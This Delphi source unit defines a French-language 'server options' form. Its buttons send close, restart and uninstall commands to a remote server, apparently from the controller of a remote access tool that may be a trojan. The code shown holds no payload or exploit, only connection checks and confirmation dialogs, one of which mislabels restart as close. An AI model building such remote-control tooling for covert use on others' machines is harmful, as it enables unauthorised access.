(***********************************************************************
************************************************************************
****                                                                ****
****                                                                ****
****     File Name: untServer.pas                                   ****
****                                                                ****
****     Author: //hIDRA_5                                          ****
****                                                                ****
****     Description: Unit main of Server form                      ****
****                                                                ****
****                                                                ****
************************************************************************
************************************************************************)

unit untServer;

interface

uses
  Classes, Windows, Controls, Forms, Buttons, ExtCtrls;

type
  TfrmServer = class(TForm)
    SpdCloseServer: TSpeedButton;
    SpdRestart: TSpeedButton;
    SpdRemove: TSpeedButton;
    procedure FormCreate(Sender: TObject);
    procedure SpdCloseServerClick(Sender: TObject);
    procedure SpdRestartClick(Sender: TObject);
    procedure SpdRemoveClick(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  frmServer: TfrmServer;

implementation

{$R *.DFM}
uses untMain, untCommands;

procedure TfrmServer.FormCreate(Sender: TObject);
begin
   Caption:='Serveur options';
end;

procedure TfrmServer.SpdCloseServerClick(Sender: TObject);
begin
   if not frmMain.ClientMain.Active then
   begin
      frmMain.PutStatus('Pas connecter...');
      Exit;
   end;
   if MessageBox(handle,'Fermer le serveur.. sure??',PChar(frmMain.Caption),MB_ICONQUESTION + MB_YESNO) <> IDYES then
      Exit;
   frmMain.strStatus:='Fermeture du serveur...';
   frmMain.SendCommand(COMMAND_SERVER_CLOSE,'');
end;

procedure TfrmServer.SpdRestartClick(Sender: TObject);
begin
   if not frmMain.ClientMain.Active then
   begin
      frmMain.PutStatus('PAS connect gna gna...');
      Exit;
   end;
   if MessageBox(handle,'Fermer le serveur. sure???',PChar(frmMain.Caption),MB_ICONQUESTION + MB_YESNO) <> IDYES then
      Exit;
   frmMain.strStatus:='Red.marage du serveur...';
   frmMain.SendCommand(COMMAND_SERVER_RESTART,'');
end;

procedure TfrmServer.SpdRemoveClick(Sender: TObject);
begin
   if not frmMain.ClientMain.Active then
   begin
      frmMain.PutStatus('PAS connect...');
      Exit;
   end;
   if MessageBox(handle,'Fermer le serveur.. sure?',PChar(frmMain.Caption),MB_ICONQUESTION + MB_YESNO) <> IDYES then
      Exit;
   frmMain.strStatus:='Dsinstallation...';
   frmMain.SendCommand(COMMAND_SERVER_UNINSTALL,'');
end;

end.
